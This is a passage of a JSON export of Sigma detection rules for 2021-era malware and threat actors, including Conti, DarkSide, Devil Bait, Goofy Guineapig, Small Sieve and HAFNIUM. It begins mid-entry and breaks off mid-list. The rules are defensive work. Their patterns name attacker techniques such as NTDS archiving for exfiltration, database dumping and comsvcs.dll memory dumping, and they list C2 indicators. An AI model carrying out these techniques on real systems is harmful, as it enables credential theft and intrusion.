    "content": "title: Conti NTDS Exfiltration Command\nid: aa92fd02-09f2-48b0-8a93-864813fb8f41\nstatus: test\ndescription: Detects a command used by conti to exfiltrate NTDS\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2022-10-09\ntags:\n    - attack.collection\n    - attack.t1560\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '7za.exe'\n            - '\\\\C$\\\\temp\\\\log.zip'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_commands.yml",
    "content": "title: Potential Conti Ransomware Activity\nid: 689308fc-cfba-4f72-9897-796c1dc61487\nstatus: test\ndescription: Detects a specific command used by the Conti ransomware group\nreferences:\n    - https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/\n    - https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19\nauthor: frack113\ndate: 2021-10-12\nmodified: 2023-02-13\ntags:\n    - attack.impact\n    - attack.s0575\n    - attack.t1486\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-m '\n            - '-net '\n            - '-size ' # Size 10 in references\n            - '-nomutex '\n            - '-p \\\\\\\\'\n            - '$'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Conti/proc_creation_win_malware_conti_ransomware_database_dump.yml",
    "content": "title: Potential Conti Ransomware Database Dumping Activity Via SQLCmd\nid: 2f47f1fd-0901-466e-a770-3b7092834a1b\nstatus: test\ndescription: Detects a command used by conti to dump database\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20 # The leak info not the files itself\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15\nauthor: frack113\ndate: 2021-08-16\nmodified: 2023-05-04\ntags:\n    - attack.collection\n    - attack.t1005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools:\n        - Image|endswith: '\\sqlcmd.exe'\n        - CommandLine|contains:\n              - 'sqlcmd '\n              - 'sqlcmd.exe'\n    selection_svr:\n        CommandLine|contains: ' -S localhost '\n    selection_query:\n        CommandLine|contains:\n            - 'sys.sysprocesses'\n            - 'master.dbo.sysdatabases'\n            - 'BACKUP DATABASE'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/DarkSide/proc_creation_win_malware_darkside_ransomware.yml",
    "content": "title: DarkSide Ransomware Pattern\nid: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c\nstatus: test\ndescription: Detects DarkSide Ransomware and helpers\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html\n    - https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/\n    - https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-14\ntags:\n    - attack.execution\n    - attack.t1204\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - '=[char][byte](''0x''+'\n            - ' -work worker0 -path '\n    selection2:\n        ParentCommandLine|contains: 'DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\n    - UAC bypass method used by other malware\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/README.md",
    "content": "# Devil Bait\n\n## Summary\n\nDevil Bait is a malicious macro-enabled Microsoft Word document targeting Korean speakers, which downloads and runs a second-stage VBScript. Both stages use ‘live off the land’ binaries (‘LOLbins’) to achieve execution, system enumeration, registry modification and persistence.\n\nYou can find more information on the threat in the following articles:\n\n- [Devil Bait - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf)\n\n## Rules\n\n- [Potential Devil Bait Related Indicator](./file_event_win_malware_devil_bait_script_drop.yml)\n- [Potential Devil Bait Malware Reconnaissance](./proc_creation_win_malware_devil_bait_output_redirect.yml)\n- [Devil Bait Potential C2 Communication Traffic](./proxy_malware_devil_bait_c2_communication.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/file_event_win_malware_devil_bait_script_drop.yml",
    "content": "title: Potential Devil Bait Related Indicator\nid: 93d5f1b4-36df-45ed-8680-f66f242b8415\nstatus: test\ndescription: Detects the creation of \".xml\" and \".txt\" files in folders of the \"\\AppData\\Roaming\\Microsoft\" directory by uncommon processes. This behavior was seen common across different Devil Bait samples and stages as described by the NCSC\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\wscript.exe'\n            - '\\mshta.exe'\n        # Example folders used by the samples include:\n        #   - %AppData%\\Microsoft\\Network\\\n        #   - %AppData%\\Microsoft\\Office\\\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\'\n        TargetFilename|endswith:\n            - '.txt'\n            - '.xml'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml",
    "content": "title: Potential Devil Bait Malware Reconnaissance\nid: e8954be4-b2b8-4961-be18-da1a5bda709c\nrelated:\n    - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892\n      type: derived\nstatus: test\ndescription: Detects specific process behavior observed with Devil Bait samples\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\n    - https://www.virustotal.com/gui/file/fa71eee906a7849ba3f4bab74edb577bd1f1f8397ca428591b4a9872ce1f1e9b/behavior\nauthor: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)\ndate: 2023-05-15\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_redirect:\n        ParentImage|endswith: '\\wscript.exe'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '>>%APPDATA%\\Microsoft\\'\n        CommandLine|endswith:\n            - '.xml'\n            - '.txt'\n    selection_recon_cmd:\n        - CommandLine|re: 'ipconfig\\s+/all'\n        - CommandLine|contains:\n              # Taken from a6f9043627f8be2452153b5dbf6278e9b91763c3b5c2aea537a859e0c8c6b504\n              # If you find samples using other commands please add them\n              - 'dir'\n              - 'systeminfo'\n              - 'tasklist'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Devil-Bait/proxy_malware_devil_bait_c2_communication.yml",
    "content": "title: Devil Bait Potential C2 Communication Traffic\nid: 514c50c9-373a-46e5-9012-f0327c526c8f\nstatus: test\ndescription: Detects potential C2 communication related to Devil Bait malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\nmodified: 2023-08-23\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains|all:\n            - '/cross.php?op='\n            - '&dt='\n            - '&uid='\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/FoggyWeb/image_load_malware_foggyweb_nobelium.yml",
    "content": "title: FoggyWeb Backdoor DLL Loading\nid: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c\nstatus: test\ndescription: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll\nreferences:\n    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-27\nmodified: 2022-12-09\ntags:\n    - attack.resource-development\n    - attack.t1587\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        ImageLoaded: 'C:\\Windows\\ADFS\\version.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/README.md",
    "content": "# Goofy Guineapig\n\n## Summary\n\nGoofy Guineapig is a persistent backdoor used to collect and exfiltrate system information and load additional plugins.\n\nYou can find more information on the threat in the following articles:\n\n- [Goofy Guineapig - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf)\n\n## Rules\n\n- [Goofy Guineapig Backdoor IOC](./file_event_win_malware_goofy_guineapig_file_indicators.yml)\n- [Potential Goofy Guineapig Backdoor Activity](./proc_creation_win_malware_goofy_guineapig_broken_cmd.yml)\n- [Potential Goofy Guineapig GoolgeUpdate Process Anomaly](./proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml)\n- [Goofy Guineapig Backdoor Potential C2 Communication](./proxy_malware_goofy_gunieapig_c2_communication.yml)\n- [Goofy Guineapig Backdoor Service Creation](./win_system_malware_goofy_guineapig_service_persistence.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/file_event_win_malware_goofy_guineapig_file_indicators.yml",
    "content": "title: Goofy Guineapig Backdoor IOC\nid: f0bafe60-1240-4798-9e60-4364b97e6bad\nstatus: test\ndescription: Detects malicious indicators seen used by the Goofy Guineapig malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename:\n            - 'C:\\ProgramData\\GoogleUpdate\\config.dat'\n            - 'C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe'\n            - 'C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat'\n            - 'C:\\ProgramData\\GoogleUpdate\\goopdate.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_broken_cmd.yml",
    "content": "title: Potential Goofy Guineapig Backdoor Activity\nid: 477a5ed3-a374-4282-9f3b-ed94e159a108\nstatus: test\ndescription: Detects a specific broken command that was used by Goofy-Guineapig as described by the NCSC report.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'choice /t %d /d y /n >nul'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proc_creation_win_malware_goofy_guineapig_googleupdate_uncommon_child_instance.yml",
    "content": "title: Potential Goofy Guineapig GoolgeUpdate Process Anomaly\nid: bdbab15a-3826-48fa-a1b7-723cd8f32fcc\nstatus: test\ndescription: Detects \"GoogleUpdate.exe\" spawning a new instance of itself in an uncommon location as seen used by the Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\GoogleUpdate.exe'\n        Image|endswith: '\\GoogleUpdate.exe'\n    filter_main_legit_paths:\n        - Image|startswith:\n              - 'C:\\Program Files\\Google\\'\n              - 'C:\\Program Files (x86)\\Google\\'\n        - Image|contains: '\\AppData\\Local\\Google\\Update\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/proxy_malware_goofy_gunieapig_c2_communication.yml",
    "content": "title: Goofy Guineapig Backdoor Potential C2 Communication\nid: 4f573bb6-701a-4b8d-91db-87ae106e9a61\nstatus: test\ndescription: Detects potential C2 communication related to Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-14\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36'\n        cs-host: 'static.tcplog.com'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Goofy-Guineapig/win_system_malware_goofy_guineapig_service_persistence.yml",
    "content": "title: Goofy Guineapig Backdoor Service Creation\nid: 8c15dd74-9570-4f48-80b2-29996fd91ee6\nstatus: test\ndescription: Detects service creation persistence used by the Goofy Guineapig backdoor\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'GoogleUpdate'\n        ImagePath|contains|all:\n            - 'rundll32'\n            - 'FileProtocolHandler'\n            - '\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Moriya-Rootkit/file_event_win_moriya_rootkit.yml",
    "content": "title: Moriya Rootkit File Created\nid: a1507d71-0b60-44f6-b17c-bf53220fdd88\nrelated:\n    - id: 25b9c01c-350d-4b95-bed1-836d04a4f324\n      type: derived\nstatus: test\ndescription: Detects the creation of a file named \"MoriyaStreamWatchmen.sys\" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.\nreferences:\n    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nauthor: Bhabesh Raj\ndate: 2021-05-06\nmodified: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\MoriyaStreamWatchmen.sys'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Netwire/registry_add_malware_netwire.yml",
    "content": "title: Potential NetWire RAT Activity - Registry\nid: 1d218616-71b0-4c40-855b-9dbe75510f7f\nstatus: test\ndescription: Detects registry keys related to NetWire RAT\nreferences:\n    - https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing\n    - https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/\n    - https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/\n    - https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line\n    - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/\nauthor: Christopher Peacock\ndate: 2021-10-07\nmodified: 2025-11-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        # The configuration information is usually stored under HKCU:\\Software\\Netwire - RedCanary\n        TargetObject|contains: '\\software\\NetWire'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/file_event_win_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor File Indicators\nid: 2bd63d53-84d4-4210-80ff-bf0658f1bf78\nrelated:\n    - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load\n      type: similar\n    - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: 'updata.exe'\n        TargetFilename: 'C:\\Windows\\oci.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/image_load_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor DLL Loading Activity\nid: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b\nrelated:\n    - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # File indicators\n      type: similar\n    - id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 # Process Creation\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection:\n        Image|endswith: '\\msdtc.exe'\n        ImageLoaded: 'C:\\Windows\\oci.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Pingback/proc_creation_win_malware_pingback_backdoor.yml",
    "content": "title: Pingback Backdoor Activity\nid: b2400ffb-7680-47c0-b08a-098a7de7e7a9\nrelated:\n    - id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b # DLL Load\n      type: similar\n    - id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 # File Indicators\n      type: similar\nstatus: test\ndescription: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report\nreferences:\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel\n    - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nauthor: Bhabesh Raj\ndate: 2021-05-05\nmodified: 2023-02-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\updata.exe'\n        CommandLine|contains|all:\n            - 'config'\n            - 'msdtc'\n            - 'start'\n            - 'auto'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/README.md",
    "content": "# Small-Sieve\n\n## Summary\n\nSmall Sieve is a simple – possibly disposable – Python backdoor which is distributed using an NSIS installer that performs persistence. It provides basic functionality required to maintain and expand a foothold in victim infrastructure using custom string and traffic obfuscation schemes together with the Telegram Bot API to avoid detection.\n\nYou can find more information on the threat in the following articles:\n\n- [Small Sieve - Malware Analysis Report by NCSC](https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf)\n\n## Rules\n\n- [Small Sieve Malware File Indicator Creation](./file_event_win_malware_small_sieve_evasion_typo.yml)\n- [Small Sieve Malware CommandLine Indicator](./proc_creation_win_malware_small_sieve_cli_arg.yml)\n- [Small Sieve Malware Potential C2 Communication](./proxy_malware_small_sieve_telegram_communication.yml)\n- [Small Sieve Malware Registry Persistence](./registry_set_malware_small_sieve_evasion_typo.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/file_event_win_malware_small_sieve_evasion_typo.yml",
    "content": "title: Small Sieve Malware File Indicator Creation\nid: 39466c42-c189-476a-989f-8cdb135c163a\nstatus: test\ndescription: Detects filename indicators that contain a specific typo seen used by the Small Sieve malware.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_typo_path:\n        TargetFilename|contains|all:\n            - ':\\Users\\'\n            - '\\AppData\\'\n        TargetFilename|contains:\n            - '\\Roaming\\'\n            - '\\Local\\'\n    selection_typo_keyword:\n        TargetFilename|contains: 'Microsift'\n    selection_ioc:\n        TargetFilename|endswith: '\\AppData\\Local\\MicrosoftWindowsOutlookDataPlus.txt'\n    condition: all of selection_typo_* or selection_ioc\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/proc_creation_win_malware_small_sieve_cli_arg.yml",
    "content": "title: Small Sieve Malware CommandLine Indicator\nid: 21117127-21c8-437a-ae03-4b51e5a8a088\nstatus: test\ndescription: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|endswith: '.exe Platypus'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/proxy_malware_small_sieve_telegram_communication.yml",
    "content": "title: Small Sieve Malware Potential C2 Communication\nid: b0422664-37a4-4e78-949a-4a139309eaf0\nstatus: test\ndescription: Detects potential C2 communication related to Small Sieve malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-host: 'api.telegram.org'\n        cs-uri|contains|all:\n            - 'chat_id=2090761833'\n            - 'text=com/'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/Small-Sieve/registry_set_malware_small_sieve_evasion_typo.yml",
    "content": "title: Small Sieve Malware Registry Persistence\nid: 65c6e3c1-fb28-4c03-a51e-84919d8185f1\nstatus: test\ndescription: Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_path:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n    selection_value:\n        - TargetObject|contains: 'Microsift'\n        - Details|contains: '.exe Platypus'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/HAFNIUM/proc_creation_win_apt_hafnium.yml",
    "content": "title: HAFNIUM Exchange Exploitation Activity\nid: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7\nstatus: test\ndescription: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers\nreferences:\n    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\n    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\n    - https://twitter.com/GadixCRK/status/1369313704869834753?s=20\n    - https://twitter.com/BleepinComputer/status/1372218235949617161\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-09\nmodified: 2023-03-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1546\n    - attack.t1053\n    - attack.g0125\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_attrib:\n        CommandLine|contains|all:\n            - 'attrib'\n            - ' +h '\n            - ' +s '\n            - ' +r '\n            - '.aspx'\n    selection_vsperfmon:\n        - Image|contains: '\\ProgramData\\VSPerfMon\\'\n        - CommandLine|contains|all:\n              - 'schtasks'\n              - 'VSPerfMon'\n    selection_opera_1:\n        Image|endswith: 'Opera_browser.exe'\n        ParentImage|endswith:\n            - '\\services.exe'\n            - '\\svchost.exe'\n    selection_opera_2:\n        Image|endswith: 'Users\\Public\\opera\\Opera_browser.exe'\n    selection_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin list shadows'\n            - 'Temp\\__output'\n    selection_makecab_1:\n        Image|endswith: '\\makecab.exe'\n        CommandLine|contains|all:\n            - 'inetpub\\wwwroot\\'\n            - '.dmp.zip'\n    selection_makecab_2:\n        Image|endswith: '\\makecab.exe'\n        CommandLine|contains:\n            - 'Microsoft\\Exchange Server\\'\n            - 'compressionmemory'\n            - '.gif'\n    selection_7zip:\n        CommandLine|contains|all:\n            - ' -t7z '\n            - 'C:\\Programdata\\pst'\n            - '\\it.zip'\n    selection_rundll32:\n        CommandLine|contains|all:\n            - '\\comsvcs.dll'\n            - 'Minidump'\n            - 'full '\n            - '\\inetpub\\wwwroot'\n    selection_other:\n        CommandLine|contains:\n            - 'Windows\\Temp\\xx.bat'\n            - 'Windows\\WwanSvcdcs'\n            - 'Windows\\Temp\\cw.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/HAFNIUM/web_exchange_exploitation_hafnium.yml",
    "content": "title: Exchange Exploitation Used by HAFNIUM\nid: 67bce556-312f-4c81-9162-c3c9ff2599b2\nstatus: test\ndescription: Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity\nreferences:\n    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\n    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-03\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.g0125\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/owa/auth/Current/themes/resources/'\n    selection_2:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/owa/auth/Current/'\n        cs-user-agent:\n            - 'DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)'\n            - 